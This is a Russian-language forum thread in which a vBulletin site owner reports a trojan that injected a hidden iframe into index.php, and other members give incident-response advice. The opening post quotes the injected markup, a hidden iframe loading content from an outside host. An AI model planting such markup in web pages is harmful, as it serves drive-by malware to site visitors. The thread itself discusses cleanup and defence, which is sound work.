imho.ws |
![]() |
![]() |
![]() |
# 1 |
Junior Member
Регистрация: 19.11.2004
Сообщения: 119
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Проблема на хостинге: iframe inject
Хотелось бы попросить многоуважаемую публику помочь мне в решении следующей проблемы. После обновления vbulletin с линейки 3.6 на 3.8 наш форум стал выдавать нас следующую ошибку:
Parse error: syntax error, unexpected T_STRING in /usr/home/forum.psifactor.ru/htdocs/index.php on line 482 После проверки кода мы обнаружли что наши файлы были атакованы каким то трояном вставляющим в index.php код следующего содержания: Код HTML:
<iframe src="http://c7h.ru:8080/index.php" width=139 height=193 style="visibility: hidden"></iframe> Мы проверили всё что можно и убедились что скорее всего данный троян сидит гдето на хостинге, однако доказать это провайдеру не представляется возможным. В связи с этим хотелось бы спросить может ли ктото объяснить как нам защитить файлы нашего форума. Заранее спасибо за помощь. Последний раз редактировалось Plague; 08.07.2009 в 21:23. Причина: тег html для кого придумали? |
![]() |
![]() |
# 2 |
Administrator
Регистрация: 06.05.2003
Адрес: Московская Подводная Лодка
Пол: Male
Сообщения: 12 059
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
а можно узнать, откуда такая уверенность???
в первую очередь, привет товарищам что пароли фтп хранят где ни попадя. в тотал командере, например. хотя последние его бета-версии (7.5) умеют вроде нормально шифровать. и не он один хранит пароли в таком виде что первый же залетный троян вскрывает их на раз-два. вопрос не по разделу, vb здесь совершенно не причем, переношу в безопасность. Да, кстати, chmod ugo-w на все php файлы спасет по идее. но троя всеже искать надо, это не метод..
__________________
все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is M.M.
|
![]() |
![]() |
# 3 |
::VIP::
Хрюндель Регистрация: 27.10.2002
Адрес: Столица блин
Сообщения: 650
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Не факт!
Тебе правильно подсказали. скорее всего у вас украли пароль от фтп. 1) меняйте срочно все пароли!!!!(фтп, панель управления хостингом ) 2) проверяйте компа на вирусы и желательно в безопасном режиме.
__________________
Если Вас выписали из сумасшедшего дома, это не значит, что Вас вылечили. Просто Вы стали как все. |
![]() |
![]() |
# 5 | |
Administrator
Регистрация: 06.05.2003
Адрес: Московская Подводная Лодка
Пол: Male
Сообщения: 12 059
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Цитата:
но это не выход, ребята. VB кстати белый, иль левый? если левый версию говори, скину список файлов с белого. может еще туда кто скрипт левый подсунул.
__________________
все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is M.M.
|
|
![]() |
![]() |
# 7 |
Administrator
Регистрация: 06.05.2003
Адрес: Московская Подводная Лодка
Пол: Male
Сообщения: 12 059
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
ну да, там по идее хорошо смотрят за этим делом.
нууу, сам движок я сливать не собираюсь ![]() а список файлов файлов я и здесь положить могу, ничего криминального в этом нет. хотя повторяю, на vbsupport народ толковый, думаю давно бы уж просекли если чего не так бы было. значит проблема на вашей стороне ©
__________________
все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is M.M.
|
![]() |
![]() |
# 8 |
Junior Member
Регистрация: 19.11.2004
Сообщения: 119
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Ещё раз спасибо. Я уже просил на vbsupport помощи. Они меня послали к хостеру и удалили тему. Проблема в том что доказать чтото хостеру нереально. Потому я и ищу альтернативные варианты защиты.
Вот по списку пройдусь теперь. Можно ли сделать чтото ещё? |
![]() |
![]() |
# 9 |
Administrator
Регистрация: 06.05.2003
Адрес: Московская Подводная Лодка
Пол: Male
Сообщения: 12 059
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
есть лечение болезни симптоматическое, а есть лечение полное. вот то что ты ищешь - это есть симптоматическое. и я его уже дважды написал.
первое что нужно сделать, это как уже сказали - поменять пароли фтп, ssh, панели, и нигде их не сохранять (карандаш и бумагу еще никто не отменял). пароли ставить ацкие. типа oeh6IgE_+B^tosX7771b. для всяческих веб панелей юзать firefox, а не насквозь дырявый ИЕ. Следующее что нужно сделать - это не спешить их раздавать если они еще кому-то нужны. и в это время, когда все изменено, смотреть - появится ли снова этот инжект. если нет - начать выдавать поочереди. в первую очередь себе. всмысле сохранить в электронном виде. после кого появится - брать биту и идти к нему в гости, компутер починять. а еще не лишним было бы написать что за хостинг (дед, вдс, web)
__________________
все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is M.M.
|
![]() |
![]() |
# 11 |
Administrator
Регистрация: 06.05.2003
Адрес: Московская Подводная Лодка
Пол: Male
Сообщения: 12 059
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
так. если тут и дальше будут испытывать мои телепатические способности, я последую примеру вбсуппорт, честное слово. сколько я еще должен инфу вытягивать??
что за хостинг? Меня не интересует кто его предоставляет, меня интересует техническая информация: dedicated/VDS/Web-hosting? Ось (UNIX/Windows)? ![]()
__________________
все "спасибы" - в приват и в репутацию! не засоряйте форум!!!! ~~~~~~~~~~~~~~~~~~~~~~ The time has come it is quite clear, our antichrist is M.M.
|
![]() |
![]() |
# 12 |
::VIP::
Хрюндель Регистрация: 27.10.2002
Адрес: Столица блин
Сообщения: 650
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
HOTMAN,
Ещё раз смотрите свои компы. Потом заберите форум на локальную тачку, и проверьте на тему левого кода. Если есть доступ по ssh то clamav проверьте, если там у вас где-то шел висит он его найдет и скажет об этом. Чудес не бывает. Хостер просто даёт место, а вся бойда происходит из под конкретного пользователя. тобиш из под вашего акка.
__________________
Если Вас выписали из сумасшедшего дома, это не значит, что Вас вылечили. Просто Вы стали как все. Последний раз редактировалось boor; 22.07.2009 в 15:10. |
![]() |
![]() |
# 13 |
Newbie
Регистрация: 13.04.2009
Сообщения: 14
![]() |
в аналогичной ситуации когда я обнаружил код iframe inject в файлах своего сайта я тупо пересобрал руками форум + моды к нему из оригинальных дистрибутивов от авторов и залинковал конфиги на старую базу. таким образом у меня была 100% гарантия что сайт чист. не вижу смысла искать изменения, цена пропущенной дыры - повторный взлом сайта.
на тему хостера... 95% что виноваты вы сами и только 5% что действительно был взломан хостер.(не все конторы достаточно чистоплотны в этом вопросе). "Мы проверили всё что можно... " вопрос в том чем вы проверяли. например NOD32 вобще антивирем называть сложно. используйте нормальные антивири, ужесточите политику безопасности на рабочих местах операторов и админа сайта. |
![]() |
![]() |
# 14 |
Guest
Сообщения: n/a
|
99% случаев подобных это троян на пк. Ему неважно какой у вас пароль. При соединении он переписывает файл и отправлет такой как ему нужно.
Тотал в этом случае вообще дырявый. Советую сменить пароль и использовать фтп программы которые имеют более высокое качество шифрования пасов (это на случай если троят не будет найден). |
![]() |
# 15 |
Котозавр
Регистрация: 15.04.2003
Адрес: Russia, Tomsk
Пол: Male
Сообщения: 1 324
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Есть путь гораздо проще, избавляет от кучи проблем - пора завязывать с виндой. Особенно веб-программерам и админам.
__________________
Паранойю у админов лечить нельзя, надо лишь следить, чтобы развивалась в нужном направлении |
![]() |
![]() |
# 17 |
Котозавр
Регистрация: 15.04.2003
Адрес: Russia, Tomsk
Пол: Male
Сообщения: 1 324
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() |
Можно подумать что на каторгу загоняют...
![]() Многие работают в Линуксе и нужды в винде не имеют вообще.
__________________
Паранойю у админов лечить нельзя, надо лишь следить, чтобы развивалась в нужном направлении |
![]() |